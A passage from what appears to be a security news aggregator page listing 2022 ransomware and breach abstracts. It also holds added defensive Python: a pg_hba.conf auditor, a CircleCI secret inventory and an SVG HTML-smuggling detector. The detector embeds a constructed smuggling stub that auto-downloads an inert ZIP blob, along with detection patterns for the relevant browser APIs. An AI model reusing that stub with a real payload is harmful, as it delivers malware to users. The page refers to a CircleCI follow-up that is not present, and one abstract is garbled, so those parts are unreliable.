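ADDRESS_KEYWORDS = {"all", "samehost", "samenet"}
HOST_TYPES = {"host", "hostssl", "hostnossl", "hostgssenc", "hostnogssenc"}


@dataclass
class Finding:
    line: int
    severity: str
    rule: str
    reason: str


def parse_pg_hba(text):
    """Return one dict per rule line. Only CIDR and keyword addresses are
    handled; the two-field 'ADDRESS NETMASK' form is not."""
    rules = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        f = line.split()
        if f[0] == "local" and len(f) >= 4:
            rules.append({"line": lineno, "type": f[0], "db": f[1], "user": f[2],
                          "address": None, "method": f[3]})
        elif f[0] in HOST_TYPES and len(f) >= 5:
            rules.append({"line": lineno, "type": f[0], "db": f[1], "user": f[2],
                          "address": f[3], "method": f[4]})
    return rules


def audit_pg_hba(text):
    """Return Findings in file order, worst first within each rule."""
    findings = []
    for r in parse_pg_hba(text):
        rule = " ".join(x for x in (r["type"], r["db"], r["user"], r["address"], r["method"]) if x)
        net = None
        if r["address"] and r["address"] not in ADDRESS_KEYWORDS:
            try:
                net = ipaddress.ip_network(r["address"], strict=False)
            except ValueError:
                findings.append(Finding(r["line"], "medium", rule, "address is not a CIDR; review manually"))
                continue
        world = r["address"] == "all" or (net is not None and net.prefixlen == 0)
        local_only = r["type"] == "local" or (net is not None and net.is_loopback)
        if r["method"] in WEAK_METHODS:
            if world:
                findings.append(Finding(r["line"], "critical", rule,
                                        f'{r["method"]} authentication reachable from any address'))
            elif local_only:
                findings.append(Finding(r["line"], "low", rule,
                                        f'{r["method"]} authentication, local connections only'))
            else:
                findings.append(Finding(r["line"], "high", rule,
                                        f'{r["method"]} authentication on network range {r["address"]}'))
        elif world:
            findings.append(Finding(r["line"], "high", rule,
                                    f'{r["method"]} authentication exposed to any address; restrict ADDRESS'))
        elif r["method"] in LEGACY_METHODS:
            findings.append(Finding(r["line"], "low", rule, "md5 is accepted but scram-sha-256 is preferred"))
    return findings


if __name__ == "__main__":
    for fnd in audit_pg_hba(SAMPLE_PG_HBA):
        print(f"line {fnd.line} [{fnd.severity}] {fnd.rule}: {fnd.reason}")
```

A trust rule for 0.0.0.0/0 means any client that can reach the port is a superuser-capable session with no password, which is exactly the foothold the abstract describes; the fix is to restrict ADDRESS to the subnets that need access, require scram-sha-256, and keep the pod off the public network in the first place.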
January 7, 2023
Attackers Abuse Genuine Windows Tool to Deliver Pupy RAT Full Text
Abstract
Researchers unearthed an interesting technique in which threat actors use WerFault.exe, the Windows Error Reporting tool, to execute Pupy RAT on victims' machines. The use of ISO files and the abuse of genuine Windows tools to deliver Pupy RAT indicate that the operators of this ... Read More Cyware
January 7, 2023
Chick-fil-A launched an investigation into “suspicious activity” Full Text
Abstract
American fast food restaurant chain Chick-fil-A informed its customers that it has launched an investigation into "suspicious activity." Chick-fil-A is the largest American fast food chain specializing in chicken... Security Affairs
January 6, 2023
Hackers Using CAPTCHA Bypass Tactics in Freejacking Campaign on GitHub Full Text
Abstract
A South Africa-based threat actor known as Automated Libra has been observed employing CAPTCHA bypass techniques to create GitHub accounts programmatically as part of a freejacking campaign dubbed PURPLEURCHIN. The group "primarily targets cloud platforms offering limited-time trials of cloud resources in order to perform their crypto mining operations," Palo Alto Networks Unit 42 researchers William Gamazo and Nathaniel Quist said. PURPLEURCHIN first came to light in October 2022 when Sysdig disclosed that the adversary created as many as 30 GitHub accounts, 2,000 Heroku accounts, and 900 Buddy accounts to scale its operation. Now, according to Unit 42, the cloud threat actor group created three to five GitHub accounts every minute at the height of its activity in November 2022, setting up over 130,000 bogus accounts in total across Heroku, Togglebox, and GitHub. More than 22,000 GitHub accounts are estimated to have been created between September and November ... The Hacker News
January 6, 2023
Saint Gheorghe Recovery Hospital in Romania suffered a ransomware attack Full Text
Abstract
The Saint Gheorghe Recovery Hospital in Botoşani, in northeastern Romania, was hit by a ransomware attack in December that is still impacting medical activity... Security Affairs
January 6, 2023
Rackspace: Play Ransomware gang used a previously unknown exploit to access its Hosted Exchange email environment Full Text
Abstract
Cloud services provider Rackspace confirmed this week that its recent data breach was the result of an attack conducted by the Play ransomware... Security Affairs
January 6, 2023
Software provider denied insurance payout after ransomware attack Full Text
Abstract
The Supreme Court of Ohio ruled that EMOI Services' insurance policy did not cover its ransomware attack, because the attack caused no direct physical harm to tangible components of the software, software having none. Cyware
January 6, 2023
PurpleUrchin Campaign Bypasses CAPTCHA and Steals Cloud Platform Resources for Cryptomining Full Text
Abstract
Automated Libra is a South Africa-based freejacking group that primarily targets cloud platforms offering limited-time trials of cloud resources in order to perform its cryptomining operations. Cyware
January 5, 2023
CircleCI Urges Customers to Rotate Secrets Following Security Incident Full Text
Abstract
DevOps platform CircleCI on Wednesday urged its customers to rotate all their secrets following an unspecified security incident. The company said an investigation is currently ongoing, but emphasized that "there are no unauthorized actors active in our systems." Additional details are expected to be shared in the coming days. "Immediately rotate any and all secrets stored in CircleCI," CircleCI's chief technology officer, Rob Zuber, said in a terse advisory. "These may be stored in project environment variables or in contexts." CircleCI is also recommending that users review internal logs for signs of any unauthorized access from December 21, 2022, to January 4, 2023, or until the secrets are rotated. The software development service did not disclose any further specifics about the breach, but said it has also invalidated all Project API tokens and that they need to be replaced. The disclosure comes weeks after the company ... The Hacker News
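Both CircleCI entries on this page (the January 14 follow-up above and this January 5 advisory) come down to the same instruction: find every secret held in project environment variables and contexts, then rotate each one at its issuer. The script below is an added example for this page, not CircleCI's tooling; it inventories those secret names so nothing is missed and marks the ones that are almost certainly long-lived cloud or registry credentials. The endpoint paths, the Circle-Token header, page-token pagination and the items/next_page_token response shape are assumptions from my recollection of the CircleCI v2 REST API and should be checked against the current API reference; the FAKE_API table is constructed so the script runs offline.

```python
"""Inventory every secret name stored in CircleCI project env vars and contexts.

Added example for this page, not CircleCI's own tooling. Endpoint paths and
response shapes are assumed from the CircleCI v2 API as I recall it; verify
them against the current reference. FAKE_API is constructed test data.
"""
import json
import urllib.request

API = "https://circleci.com/api/v2"

# Name prefixes that almost always denote long-lived issuer credentials,
# which must be rotated at the issuer, not merely overwritten in CircleCI.
HIGH_VALUE = ("AWS_", "GCP_", "GOOGLE_", "AZURE_", "DOCKER_", "NPM_TOKEN",
              "PYPI_", "GITHUB_TOKEN", "SSH_")


def http_get_json(url, token):
    """Real transport: one authenticated GET returning parsed JSON."""
    req = urllib.request.Request(url, headers={"Circle-Token": token,
                                               "Accept": "application/json"})
    with urllib.request.urlopen(req, timeout=30) as resp:
        return json.load(resp)


def get_all(path, token, fetch=http_get_json):
    """GET a list endpoint and follow next_page_token until exhausted."""
    items, page_token = [], None
    while True:
        url = f"{API}{path}"
        if page_token:
            url += ("&" if "?" in url else "?") + f"page-token={page_token}"
        body = fetch(url, token)
        items.extend(body.get("items", []))
        page_token = body.get("next_page_token")
        if not page_token:
            return items


def inventory_secrets(project_slugs, org_id, token, fetch=http_get_json):
    """Return [(scope, name, is_high_value)] for every stored secret."""
    found = []
    for slug in project_slugs:
        for ev in get_all(f"/project/{slug}/envvar", token, fetch):
            found.append((f"project:{slug}", ev["name"]))
    for ctx in get_all(f"/context?owner-id={org_id}", token, fetch):
        for ev in get_all(f"/context/{ctx['id']}/environment-variable", token, fetch):
            found.append((f"context:{ctx['name']}", ev["variable"]))
    return [(scope, name, name.upper().startswith(HIGH_VALUE)) for scope, name in found]


# Constructed responses standing in for the API, including a two-page
# project listing so the pagination path is exercised.
FAKE_API = {
    f"{API}/project/gh/example-org/api/envvar": {
        "items": [{"name": "AWS_SECRET_ACCESS_KEY", "value": "xxxx1234"}],
        "next_page_token": "p2"},
    f"{API}/project/gh/example-org/api/envvar?page-token=p2": {
        "items": [{"name": "SENTRY_DSN", "value": "xxxx5678"}],
        "next_page_token": None},
    f"{API}/context?owner-id=0000-org": {
        "items": [{"id": "ctx-1", "name": "deploy"}], "next_page_token": None},
    f"{API}/context/ctx-1/environment-variable": {
        "items": [{"variable": "DOCKER_PASSWORD", "context_id": "ctx-1"}],
        "next_page_token": None},
}


def fake_fetch(url, token):
    """Offline stand-in for http_get_json."""
    assert token, "a personal API token is required"
    return FAKE_API[url]


if __name__ == "__main__":
    for scope, name, hv in inventory_secrets(["gh/example-org/api"], "0000-org",
                                             "dummy-token", fetch=fake_fetch):
        print(f"{'ROTATE AT ISSUER' if hv else 'rotate'}  {scope}  {name}")
```

Against the real service, drop the fetch argument and pass a personal API token plus every project slug in the organization. Note that the API only ever returns masked values, so the script can tell you what to rotate but never what the old value was; the replacement must be minted by the issuing system (the cloud provider, the package registry, and so on), and the leaked value stays valid there until it is revoked, whatever CircleCI holds.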
January 4, 2023
U.S. rail and locomotive company Wabtec hit with LockBit ransomware Full Text
Abstract
U.S. rail and locomotive company Wabtec Corporation disclosed a data breach after it was hit with a LockBit ransomware attack. Wabtec Corporation is an American company formed by the merger of the Westinghouse Air Brake Company (WABCO)... Security Affairs
January 2, 2023
Barbados: QEH progress report on cyberattack Full Text
Abstract
The out-patients clinic remains open to the public. However, there may be delays and changes to their visit given the current situation. The cybersecurity incident has prevented the department from issuing appointment dates at this time.Cyware
January 2, 2023
Possible Cyberattack at CentraState Prompts Hospital to Divert Ambulances Full Text
Abstract
Spokeswoman Lori Palmer said critical care at the hospital has not been affected and the hospital is still taking some walk-in patients. Additionally, outpatient services were to be suspended at 1 PM Friday and remain that way until further notice.Cyware
January 2, 2023
Bristol Community College’s Computer Systems Hacked in Ransomware Attack Full Text
Abstract
The college, which has a campus in Attleboro, said in a statement posted Friday on its website its computer network was hacked by a “criminal cyberattack” and “this incident involved ransomware encryption.”Cyware
January 2, 2023
Pro-Russia cyberattacks aim at destabilizing Poland, security agency warns Full Text
Abstract
Poland's security agency warns that pro-Russian hackers have been continuously targeting the state since the start of the invasion of Ukraine, with the country a constant target of cyber attacks conducted by pro-Russian... Security Affairs
December 30, 2022
Royal ransomware Group Claims Attacking Iowa PBS station Full Text
Abstract
Two days after Iowa PBS became aware of the incident, several local news outlets reported it cut short its annual fall fundraising pledge drive due to a cyberattack. The Royal ransomware group took credit for the attack.Cyware
December 30, 2022
Lockbit ransomware gang claims to have hacked the Port of Lisbon Full Text
Abstract
The website for the Port of Lisbon is still down days after it was the target of a ransomware attack claimed by Lockbit group. The Port of Lisbon is the third-largest port in Portugal and one of the main European ports due to its strategic location. The...Security Affairs
December 30, 2022
Toy Maker Jakks Pacific Reports Cyberattack Full Text
Abstract
The firm – which is one of the biggest toy companies in the world thanks to licensing deals with Disney and Nintendo – hired cybersecurity experts to deal with the incident and restore their servers.Cyware
December 29, 2022
EarSpy Attack Eavesdrops Using Motion Sensors Full Text
Abstract
Academic researchers from five American universities discovered a new attack method called EarSpy that can be used to eavesdrop on Android phones via motion sensors. According to experts, one way to reduce the efficacy of the EarSpy attack is to set the volume lower for the ear speakers.Cyware
December 29, 2022
Louisiana hospital system LCMHS suffered a ransomware attack that impacted 270,000 patients Full Text
Abstract
The Lake Charles Memorial Health System (LCMHS) disclosed a data breach, the result of a ransomware attack, that affected almost 270,000 patients at its medical centers. The Lake... Security Affairs
December 29, 2022
Lake Charles Memorial Hospital Suffered a Ransomware Attack Full Text
Abstract
Hive group laid bare the files that were allegedly stolen after breaking into LCMHS systems. Bills of materials, cards, contracts, medical information, papers, medical records, scans, residents, and other documents are among the files listed.Cyware
December 28, 2022
Royal ransomware claims attack on Intrado telecom provider Full Text
Abstract
The Royal Ransomware gang claimed responsibility for a cyber attack against telecommunications company Intrado on Tuesday.BleepingComputer
December 28, 2022
Ransomware attack at Louisiana hospital impacts 270,000 patients Full Text
Abstract
The Lake Charles Memorial Health System (LCMHS) is sending out notices of a data breach affecting almost 270,000 people who have received care at one of its medical centers.BleepingComputer
December 28, 2022
Defrost Finance Breaks Silence on ‘Exit Scam’ Accusations, Denies Rug Pull Full Text
Abstract
On Dec. 23, the platform announced it suffered a flash loan attack, leading to the draining of user funds from its v2 protocol. One day later, another incident saw a hacker steal the admin key for a second “much larger” attack on the v1 protocol.Cyware
December 27, 2022
EarSpy attack eavesdrops on Android phones via motion sensors Full Text
Abstract
A team of researchers has developed an eavesdropping attack for Android devices that can, to various degrees, recognize the caller's gender and identity, and even discern private speech.BleepingComputer
December 26, 2022
Labour Attacks Delays to Online Safety Bill as it Highlights Christmas Scams Full Text
Abstract
The bill has been hit by repeated delays and amendments. It has since been held up while ministers re-wrote parts of it, given a row among Conservative MPs that it would unfairly stifle freedom of speech online.Cyware
December 23, 2022
New STEPPY#KAVACH Attack Campaign Likely Targeting Indian Government Full Text
Abstract
The new malicious campaign from STEPPY#KAVACH observed over the past few weeks appears to share many common TTPs with the SideCopy/APT36 threat actors that were extremely active in 2021 and were previously attributed to Pakistan by some researchers.Cyware
December 23, 2022
An Iranian group hacked Israeli CCTV cameras, defense was aware but didn’t block it Full Text
Abstract
An Iranian hacker group known as Moses Staff seized control of dozens of CCTV cameras in Israel in 2021 and maintained access for a long period of time; the hack was known to the authorities... Security Affairs
December 22, 2022
Stolen certificates in two waves of ransomware and wiper attacks Full Text
Abstract
The threat actors used certificates from Nvidia and Kuwait Telecommunications Company to sign their malware; the former was already leaked, but we’re not sure how they got their hands on the latter.Cyware
December 22, 2022
Comcast Xfinity accounts hacked in widespread 2FA bypass attacks Full Text
Abstract
Comcast Xfinity customers report their accounts being hacked in widespread attacks that bypass two-factor authentication. These compromised accounts are then used to reset passwords for other services, such as the Coinbase and Gemini crypto exchanges.BleepingComputer
December 21, 2022
Russians hacked JFK airport’s taxi dispatch system for profit Full Text
Abstract
Two U.S. citizens were arrested for allegedly conspiring with Russian hackers to hack the John F. Kennedy International Airport (JFK) taxi dispatch system to move specific taxis to the front of the queue in exchange for a $10 fee.BleepingComputer
December 21, 2022
German industrial giant ThyssenKrupp targeted in a new cyberattack Full Text
Abstract
German multinational industrial engineering and steel production giant ThyssenKrupp AG was the target of a cyberattack; the company announced that its Materials Services... Security Affairs
December 21, 2022
German Steel Production Giant ThyssenKrupp Targeted in a New Cyberattack Full Text
Abstract
At the time of reporting, the company is yet to disclose the type of attack that hit its systems and no cybercriminal group has yet claimed responsibility for the attack.Cyware
December 20, 2022
Hackers bombard PyPI platform with information-stealing malware Full Text
Abstract
The PyPI Python package repository is being bombarded by a wave of information-stealing malware hiding inside malicious packages uploaded to the platform to steal software developers' data. BleepingComputer
December 20, 2022
Attack Campaign Spreads Raspberry Robin Malware Across Europe, South America, and Oceania Full Text
Abstract
The group behind Raspberry Robin appears to be testing the waters to see how far its deployments can spread. The majority of the group's victims are government agencies or telecommunication entities in South America, Europe, and Oceania. Cyware
December 19, 2022
Play ransomware claims attack on German hotel chain H-Hotels Full Text
Abstract
The Play ransomware gang has claimed responsibility for a cyber attack on H-Hotels (h-hotels.com) that has resulted in communication outages for the company.BleepingComputer
December 19, 2022
Ukraine’s DELTA military system users targeted by info-stealing malware Full Text
Abstract
A compromised Ukrainian Ministry of Defense email account was found sending phishing emails and instant messages to users of the 'DELTA' situational awareness program to infect systems with information-stealing malware.BleepingComputer
December 19, 2022
Qakbot Attackers Manipulate SVG Files in HTML Smuggling Attack Full Text
Abstract
Phishing campaigns delivering the QBot malware have started using a new technique: SVG files that perform HTML smuggling, locally creating a malicious installer for Windows systems. This allows the attackers to stay under the radar and bypass security tools that ... Read More Cyware
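The abstract above describes the technique but not what to look for in a file. The Python script below is an added example for this page, not code from the Qakbot operators or from the researchers who reported the campaign: it parses an SVG, pulls out every script element and event-handler attribute, looks for the browser APIs an HTML-smuggling stub needs to turn an embedded string into a file download, and decodes any long base64 run to see whether a ZIP or PE header is hiding inside. Both SVG samples in it are constructed; the embedded "payload" is a zero-filled blob with a ZIP magic header, not a real installer.

```python
"""Flag SVG files that carry an HTML-smuggling payload.

Added example for this page, not code from the Qakbot operators or the
researchers who reported the campaign. Both SVG samples are constructed; the
'payload' is a zero-filled blob with a ZIP local-file header on the front.
"""
import base64
import re
import xml.etree.ElementTree as ET

# Browser APIs a smuggling stub needs to turn an embedded string into a
# downloaded file. A static image has no legitimate use for any of them.
SMUGGLING_APIS = ("atob(", "Blob(", "createObjectURL", "msSaveOrOpenBlob",
                  ".download", ".click(", "Uint8Array")
B64_RUN = re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")
MAGIC = {b"PK\x03\x04": "zip", b"MZ": "pe", b"\x7fELF": "elf"}

# Constructed stand-in for the smuggled archive: ZIP magic plus 300 zero bytes.
_FAKE_ZIP_B64 = base64.b64encode(b"PK\x03\x04" + bytes(300)).decode()

SMUGGLING_SVG = f"""<svg xmlns="http://www.w3.org/2000/svg" width="1" height="1">
  <script type="text/javascript"><![CDATA[
    var b64 = "{_FAKE_ZIP_B64}";
    var bin = atob(b64), buf = new Uint8Array(bin.length);
    for (var i = 0; i < bin.length; i++) buf[i] = bin.charCodeAt(i);
    var blob = new Blob([buf], {{type: "application/octet-stream"}});
    var a = document.createElement("a");
    a.href = URL.createObjectURL(blob);
    a.download = "invoice.zip";
    a.click();
  ]]></script>
</svg>"""

BENIGN_SVG = """<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">
  <rect x="1" y="1" width="8" height="8" fill="#036"/>
</svg>"""


def _local_name(qualified):
    """Strip an XML namespace prefix like {http://...} from a tag or attribute."""
    return qualified.rsplit("}", 1)[-1]


def analyse_svg(svg_text):
    """Return a dict with script count, smuggling APIs seen, decoded payloads,
    a score and a verdict."""
    root = ET.fromstring(svg_text)
    scripts = []
    for el in root.iter():
        if _local_name(el.tag) == "script":
            scripts.append(el.text or "")
        for attr, val in el.attrib.items():          # onload="..." and friends
            if _local_name(attr).lower().startswith("on"):
                scripts.append(val)
    report = {"scripts": len(scripts), "apis": [], "payloads": [], "score": 0}
    for code in scripts:
        for api in SMUGGLING_APIS:
            if api in code and api not in report["apis"]:
                report["apis"].append(api)
        for m in B64_RUN.finditer(code):
            token = m.group(0)
            try:
                blob = base64.b64decode(token + "=" * (-len(token) % 4))
            except ValueError:
                continue
            kind = next((name for magic, name in MAGIC.items() if blob.startswith(magic)),
                        "unknown")
            report["payloads"].append({"bytes": len(blob), "type": kind})
    report["score"] = ((1 if scripts else 0) + len(report["apis"])
                       + sum(3 if p["type"] != "unknown" else 1 for p in report["payloads"]))
    report["verdict"] = "suspicious" if report["score"] >= 4 else "clean"
    return report


if __name__ == "__main__":
    for label, doc in (("smuggling", SMUGGLING_SVG), ("benign", BENIGN_SVG)):
        print(label, analyse_svg(doc))
```

The point for detection is that the script element and the atob/Blob/createObjectURL calls are a strong signal on their own, whatever the payload turns out to be; decoding the base64 run only confirms it and tells you what kind of file the victim's browser would have written to disk.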
December 18, 2022
Fire and rescue service in Victoria, Australia, confirms cyber attack Full Text
Abstract
The fire and rescue service in the state of Victoria (FRV), Australia, has shut down its network and turned to manual operations after a cyberattack. FRV shut down its network after... Security Affairs
December 16, 2022
Colombian energy supplier EPM hit by BlackCat ransomware attack Full Text
Abstract
Colombian energy company Empresas Públicas de Medellín (EPM) suffered a BlackCat/ALPHV ransomware attack on Monday, disrupting the company's operations and taking down online services.BleepingComputer
December 14, 2022
‘Crisis Situation’ Declared as Two Swedish Municipalities Hit by Cyberattack Full Text
Abstract
An intrusion has been confirmed into the joint IT system used by the two municipalities of Borgholm and Mörbylånga, which together make up the island of Öland with a total population of just over 25,000.Cyware
December 13, 2022
LockBit claims attack on California’s Department of Finance Full Text
Abstract
The Department of Finance in California has been the target of a cyberattack now claimed by the LockBit ransomware gang.BleepingComputer
December 13, 2022
Ukrainian Railway, Government Agencies Allegedly Targeted by DolphinCape Malware Full Text
Abstract
The attacks involved an email campaign in which hackers sent out messages purportedly on behalf of Ukraine’s State Emergency Service with tips on how to identify a kamikaze drone.Cyware
December 12, 2022
Play ransomware claims attack on Belgian city of Antwerp Full Text
Abstract
The Play ransomware operation has claimed responsibility for a recent cyberattack on the Belgian city of Antwerp. BleepingComputer
December 12, 2022
Knox College president addresses ransomware incident as notorious group claims credit Full Text
Abstract
The Hive ransomware group claimed to have encrypted “critical infrastructure and data,” compromised the college’s backup servers, and mined sensitive personal information like medical records and social security numbers.Cyware
December 12, 2022
TrueBot infections were observed in Clop ransomware attacks Full Text
Abstract
Cisco Talos researchers reported an increase in TrueBot infections and noted that the attackers have shifted from malicious emails as their primary delivery method to other techniques. The threat actors... Security Affairs
December 9, 2022
Supply Chain Attack via New Malicious Python Package, “shaderz” Full Text
Abstract
This Python package was published on December 2, 2022, according to its PyPI page. The package includes malicious code in its setup.py installation script that downloads and runs an executable file as part of its installation. Cyware
December 8, 2022
French Sporting Goods Retailer Intersport Hit by Hive Ransomware Group Full Text
Abstract
The breach allegedly happened in November, with details made available only on the dark web. Passports, paystubs, and other details on Intersport customers are included in a sample file that media outlet Numerama claims Hive leaked on the dark web.Cyware
December 8, 2022
Cincinnati restaurants under attack by cyber hackers Full Text
Abstract
Multiple restaurants in Cincinnati, Ohio, are fighting cyber hackers who have stolen thousands of dollars, damaged their reputations, and shut down their social media pages.Cyware
December 07, 2022
CloudSEK claims it was hacked by another cybersecurity firm Full Text
Abstract
Indian cybersecurity firm CloudSEK says a threat actor gained access to its Confluence server using stolen credentials for one of its employees' Jira accounts.BleepingComputer
December 7, 2022
South Pacific vacations may be wrecked by ransomware Full Text
Abstract
New Zealand's Privacy Commission has signaled it may open an investigation into local managed services provider Mercury IT, which serves many government agencies and businesses and has been hit by ransomware.Cyware
December 05, 2022
Ransomware attack forces French hospital to transfer patients Full Text
Abstract
The André-Mignot teaching hospital in the suburbs of Paris had to shut down its phone and computer systems because of a ransomware attack that hit on Saturday evening.BleepingComputer
December 5, 2022
‘Cybersecurity incident’ hits San Diego Unified computer network Full Text
Abstract
District Superintendent Lamont Jackson on Thursday sent a letter to his staff and families of students attending SDUSD campuses to apprise them of what he described as a "cybersecurity incident."Cyware
December 5, 2022
India: Safdarjung Hospital reports cyberattack but not ransomware; AIIMS server down for 11th day Full Text
Abstract
According to the officials, the Safdarjung hospital runs its OPD services manually, so the impact had not been severe. Meanwhile, the AIIMS server remained down for an 11th day. Cyware
December 2, 2022
New Zealand health insurer Accuro says it’s been hacked, can’t rule out customers’ data being accessed Full Text
Abstract
Accuro, a New Zealand health insurer, says a cybersecurity incident has compromised its ability to access systems but it's not yet known whether customer data is exposed.Newshub
November 30, 2022
IKEA Investigating Cyberattacks on Outlets in Kuwait, Morocco Full Text
Abstract
Swedish furniture giant IKEA confirmed that its franchises in Kuwait and Morocco are dealing with a cyberattack that caused a disturbance on some operating systems. They were added to the leak site of the Vice Society ransomware group on Monday.The Record
November 30, 2022
Keralty ransomware attack impacts Colombia’s health care system Full Text
Abstract
The Keralty multinational healthcare organization suffered a RansomHouse ransomware attack on Sunday, disrupting the websites and operations of the company and its subsidiaries.BleepingComputer
November 30, 2022
Attackers abused the popular TikTok Invisible Challenge to spread info-stealer Full Text
Abstract
Threat actors are exploiting interest in a popular TikTok challenge, dubbed the Invisible Challenge, to trick users into downloading info-stealing malware... Security Affairs
November 28, 2022
RansomBoggs Attacks in Ukraine Linked To Russian Hackers Full Text
Abstract
ESET researchers connected the Russian Sandworm APT group to a new ransomware, dubbed RansomBoggs, that has been targeting Ukrainian entities. Sandworm’s linkage with the new RansomBoggs indicates that the group is actively enhancing its toolset to make its attacks efficient.Cyware Alerts - Hacker News
November 25, 2022
New ransomware attacks in Ukraine linked to Russian Sandworm hackers Full Text
Abstract
New ransomware attacks targeting organizations in Ukraine first detected this Monday have been linked to the notorious Russian military threat group known as Sandworm.BleepingComputer
November 25, 2022
Vice Society ransomware claims attack on Cincinnati State college Full Text
Abstract
The Vice Society ransomware operation has claimed responsibility for a cyberattack on Cincinnati State Technical and Community College, with the threat actors now leaking data allegedly stolen during the attack.BleepingComputer
November 24, 2022
An aggressive malware campaign targets US-based companies with Qakbot to deliver Black Basta Ransomware Full Text
Abstract
Researchers warn of an ongoing aggressive Qakbot malware campaign that leads to Black Basta ransomware infections in the US. Experts at the Cybereason Global SOC (GSOC) team have observed a surge in Qakbot infections as part of an ongoing aggressive...Security Affairs
November 23, 2022
Russian hackers Killnet launch multiple attacks on UK websites Full Text
Abstract
A Russian hacking outfit has claimed to have taken down the website of the Prince of Wales over the UK's continued support for Ukraine. Killnet said it had launched the attack "due to the supply of high-precision missiles to Ukraine".Express
November 18, 2022
Ongoing supply chain attack targets Python developers with WASP Stealer Full Text
Abstract
A threat actor tracked as WASP is behind an ongoing supply chain attack targeting Python developers with the WASP Stealer. Checkmarx researchers uncovered an ongoing supply chain attack conducted by a threat actor they tracked as WASP that is targeting...Security Affairs
November 17, 2022
Two public schools in Michigan hit by a ransomware attack Full Text
Abstract
Public schools in two Michigan counties were forced to halt their activities, including the lessons, after a ransomware attack. Public schools in Jackson and Hillsdale counties, Michigan, reopen after a closure of two days caused by a ransomware...Security Affairs
November 17, 2022
Magento and Adobe Commerce websites under attack Full Text
Abstract
Researchers warn of a surge in cyberattacks targeting CVE-2022-24086, a pre-authentication issue impacting Adobe Commerce and Magento stores. In September 2022, Sansec researchers warned of a surge in hacking attempts targeting a critical Magento...Security Affairs
November 16, 2022
New RapperBot Campaign targets game servers with DDoS attacks Full Text
Abstract
Fortinet researchers discovered new samples of RapperBot used to build a botnet that launches distributed denial-of-service (DDoS) attacks against game servers. Fortinet FortiGuard Labs researchers have discovered new samples of the RapperBot malware that are being used...Security Affairs
November 16, 2022
Magento stores targeted in massive surge of TrojanOrders attacks Full Text
Abstract
At least seven hacking groups are behind a massive surge in 'TrojanOrders' attacks targeting Magento 2 websites, exploiting a vulnerability that allows the threat actors to compromise vulnerable servers.BleepingComputer
November 14, 2022
Bahrain Government Websites Attacked Right Before Parliamentary Election Full Text
Abstract
The Interior Ministry did not identify the websites targeted, but the country's state-run Bahrain News Agency could not be reached online nor could the website for Bahrain's parliament.ABC News
November 12, 2022
StrelaStealer and IceXLoader Drive Info-Stealing Campaigns Full Text
Abstract
Researchers have discovered new waves of malware campaigns, with two information-stealing malware, StrelaStealer and IceXLoader, infecting victims with malicious email attachments. StrelaStealer searches for credentials stored in the Thunderbird and Outlook email clients to steal them. IceXLoader i ...Cyware Alerts - Hacker News
November 12, 2022
Canadian supermarket chain giant Sobeys suffered a ransomware attack Full Text
Abstract
Sobeys, the second-largest supermarket chain in Canada, was the victim of a ransomware attack conducted by the Black Basta gang. Sobeys Inc. is the second-largest supermarket chain in Canada; the company operates over 1,500 stores across...Security Affairs
November 11, 2022
Experts Uncover Two Long-Running Android Spyware Campaigns Targeting Uyghurs Full Text
Abstract
Two long-running surveillance campaigns have been found targeting the Uyghur community in China and elsewhere with Android spyware tools designed to harvest sensitive information and track their whereabouts. This encompasses a previously undocumented malware strain called BadBazaar and updated variants of an espionage artifact dubbed MOONSHINE by researchers from the University of Toronto's Citizen Lab in September 2019. "Mobile surveillance tools like BadBazaar and MOONSHINE can be used to track many of the 'pre-criminal' activities, actions considered indicative of religious extremism or separatism by the authorities in Xinjiang," Lookout said in a detailed write-up of the operations. The BadBazaar campaign, according to the security firm, is said to date as far back as late 2018 and comprise 111 unique apps that masquerade as benign video players, messengers, religious apps, and even TikTok. While these samples were distributed through Uyghur-languageThe Hacker News
November 11, 2022
An initial access broker claims to have hacked Deutsche Bank Full Text
Abstract
An initial access broker claims to have hacked Deutsche Bank and is offering access to its systems for sale on Telegram. A threat actor (0x_dump) claims to have hacked the multinational investment bank Deutsche Bank and is offering access to its network...Security Affairs
November 11, 2022
Canadian food retail giant Sobeys hit by Black Basta ransomware Full Text
Abstract
Grocery stores and pharmacies belonging to Canadian food retail giant Sobeys have been experiencing IT systems issues since last weekend.BleepingComputer
November 11, 2022
Microsoft Blames Russian Hackers for Prestige Ransomware Attacks on Ukraine and Poland Full Text
Abstract
Microsoft on Thursday attributed the recent spate of ransomware incidents targeting transportation and logistics sectors in Ukraine and Poland to a threat cluster that shares overlaps with the Russian state-sponsored Sandworm group. The attacks, which were disclosed by the tech giant last month, involved a strain of previously undocumented malware called Prestige and are said to have taken place within an hour of each other across all victims. The Microsoft Threat Intelligence Center (MSTIC) is now tracking the threat actor under its element-themed moniker Iridium (née DEV-0960), citing overlaps with Sandworm (aka Iron Viking, TeleBots, and Voodoo Bear). "This attribution assessment is based on forensic artifacts, as well as overlaps in victimology, tradecraft, capabilities, and infrastructure, with known Iridium activity," MSTIC said in an update. The company also further assessed the group to have orchestrated compromise activity targeting many of the Prestige vicThe Hacker News
November 10, 2022
Warning: New Massive Malicious Campaigns Targeting Top Indian Banks’ Customers Full Text
Abstract
Cybersecurity researchers are warning of "massive phishing campaigns" that distribute five different malware targeting banking users in India. "The bank customers targeted include account subscribers of seven banks, including some of the most well-known banks located in the country and potentially affecting millions of customers," Trend Micro said in a report published this week. Some of the targeted banks include Axis Bank, ICICI Bank, and the State Bank of India (SBI), among others. The infection chains all have a common entry point in that they rely on SMS messages containing a phishing link that urge potential victims to enter their personal details and credit card information to supposedly get a tax refund or gain credit card reward points. The smishing attacks, which deliver Elibomi, FakeReward, AxBanker, IcRAT, and IcSpy, are just the latest in a series of similar rewards-themed malware campaigns that have been documented by Microsoft, Cyble, and KThe Hacker News
November 09, 2022
Several Cyber Attacks Observed Leveraging IPFS Decentralized Network Full Text
Abstract
